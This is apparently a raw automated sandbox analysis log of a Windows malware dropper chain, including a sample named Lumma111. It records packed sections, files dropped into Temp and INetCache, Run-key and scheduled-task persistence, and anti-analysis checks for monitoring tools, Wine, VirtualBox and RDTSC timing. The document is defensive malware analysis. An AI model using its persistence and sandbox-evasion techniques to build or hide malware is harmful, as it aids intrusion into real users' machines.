Source: random[1].exe.6.dr Static PE information: real checksum: 0x43a3d5 should be: 0x436398
Source: random[1].exe1.6.dr Static PE information: real checksum: 0x1db102 should be: 0x1dc122
Source: Lumma111[1].exe.6.dr Static PE information: real checksum: 0x1cfc23 should be: 0x1d7d2c
Source: c8a61f4196.exe.6.dr Static PE information: real checksum: 0x2b146b should be: 0x2acfe4
Source: random[1].exe2.6.dr Static PE information: real checksum: 0x1c7678 should be: 0x1c4691
Source: 686764db73.exe.6.dr Static PE information: real checksum: 0x1c7678 should be: 0x1c4691
Source: cfc45d1c7c.exe.6.dr Static PE information: real checksum: 0x1db102 should be: 0x1dc122
Source: ae87049195.exe.6.dr Static PE information: real checksum: 0x43a3d5 should be: 0x436398
Source: file.exe Static PE information: real checksum: 0x1cd039 should be: 0x1d39cb
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1cd039 should be: 0x1d39cb
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x2b146b should be: 0x2acfe4
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: hwqxmwlo
Source: file.exe Static PE information: section name: mfzfwoib
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: hwqxmwlo
Source: skotes.exe.0.dr Static PE information: section name: mfzfwoib
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: mouszfiw
Source: random[1].exe.6.dr Static PE information: section name: uiwjboqc
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name: fysdnnem
Source: random[1].exe0.6.dr Static PE information: section name: nvcnsgcm
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: ae87049195.exe.6.dr Static PE information: section name:
Source: ae87049195.exe.6.dr Static PE information: section name: .rsrc
Source: ae87049195.exe.6.dr Static PE information: section name: .idata
Source: ae87049195.exe.6.dr Static PE information: section name:
Source: ae87049195.exe.6.dr Static PE information: section name: mouszfiw
Source: ae87049195.exe.6.dr Static PE information: section name: uiwjboqc
Source: ae87049195.exe.6.dr Static PE information: section name: .taggant
Source: c8a61f4196.exe.6.dr Static PE information: section name:
Source: c8a61f4196.exe.6.dr Static PE information: section name: .idata
Source: c8a61f4196.exe.6.dr Static PE information: section name: fysdnnem
Source: c8a61f4196.exe.6.dr Static PE information: section name: nvcnsgcm
Source: c8a61f4196.exe.6.dr Static PE information: section name: .taggant
Source: Lumma111[1].exe.6.dr Static PE information: section name:
Source: Lumma111[1].exe.6.dr Static PE information: section name: .idata
Source: Lumma111[1].exe.6.dr Static PE information: section name:
Source: Lumma111[1].exe.6.dr Static PE information: section name: ucbvvkym
Source: Lumma111[1].exe.6.dr Static PE information: section name: dvaxjyps
Source: Lumma111[1].exe.6.dr Static PE information: section name: .taggant
Source: Lumma111.exe.6.dr Static PE information: section name:
Source: Lumma111.exe.6.dr Static PE information: section name: .idata
Source: Lumma111.exe.6.dr Static PE information: section name:
Source: Lumma111.exe.6.dr Static PE information: section name: ucbvvkym
Source: Lumma111.exe.6.dr Static PE information: section name: dvaxjyps
Source: Lumma111.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: akxghhwi
Source: random[1].exe1.6.dr Static PE information: section name: yjeyyxpl
Source: random[1].exe1.6.dr Static PE information: section name: .taggant
Source: cfc45d1c7c.exe.6.dr Static PE information: section name:
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: .idata
Source: cfc45d1c7c.exe.6.dr Static PE information: section name:
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: akxghhwi
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: yjeyyxpl
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: lgjpmlrc
Source: random[1].exe2.6.dr Static PE information: section name: fjrpqkrp
Source: random[1].exe2.6.dr Static PE information: section name: .taggant
Source: 686764db73.exe.6.dr Static PE information: section name:
Source: 686764db73.exe.6.dr Static PE information: section name: .idata
Source: 686764db73.exe.6.dr Static PE information: section name:
Source: 686764db73.exe.6.dr Static PE information: section name: lgjpmlrc
Source: 686764db73.exe.6.dr Static PE information: section name: fjrpqkrp
Source: 686764db73.exe.6.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000BD91C push ecx; ret 6_2_000BD92F
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Code function: 10_3_05A51B58 push ebp; retf 10_3_05A51B59
Source: file.exe Static PE information: section name: entropy: 7.979160367014145
Source: file.exe Static PE information: section name: hwqxmwlo entropy: 7.953423519074596
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.979160367014145
Source: skotes.exe.0.dr Static PE information: section name: hwqxmwlo entropy: 7.953423519074596
Source: random[1].exe.6.dr Static PE information: section name: mouszfiw entropy: 7.954712604931779
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.800415560775893
Source: ae87049195.exe.6.dr Static PE information: section name: mouszfiw entropy: 7.954712604931779
Source: c8a61f4196.exe.6.dr Static PE information: section name: entropy: 7.800415560775893
Source: Lumma111[1].exe.6.dr Static PE information: section name: entropy: 7.977377595535906
Source: Lumma111[1].exe.6.dr Static PE information: section name: ucbvvkym entropy: 7.954542090585643
Source: Lumma111.exe.6.dr Static PE information: section name: entropy: 7.977377595535906
Source: Lumma111.exe.6.dr Static PE information: section name: ucbvvkym entropy: 7.954542090585643
Source: random[1].exe1.6.dr Static PE information: section name: entropy: 7.9788040996126055
Source: random[1].exe1.6.dr Static PE information: section name: akxghhwi entropy: 7.953902225631802
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: entropy: 7.9788040996126055
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: akxghhwi entropy: 7.953902225631802
Source: random[1].exe2.6.dr Static PE information: section name: lgjpmlrc entropy: 7.95444458255911
Source: 686764db73.exe.6.dr Static PE information: section name: lgjpmlrc entropy: 7.95444458255911
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Lumma111[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 064deba48e.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8a61f4196.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cfc45d1c7c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 686764db73.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cfc45d1c7c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cfc45d1c7c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 686764db73.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 686764db73.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 064deba48e.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 064deba48e.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8a61f4196.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8a61f4196.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8F31 second address: BB8F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8F37 second address: BB8F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB90DA second address: BB90E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB90E0 second address: BB90E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB922E second address: BB9232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
